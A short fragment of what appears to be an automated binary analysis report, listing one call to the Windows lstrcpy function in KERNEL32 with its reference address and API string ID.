                            • lstrcpy.KERNEL32(00000000,?), ref: 00D61693
                            Similarity
                            • API ID: lstrcpy
                            • String ID:
                            • API String ID: 3722407311-0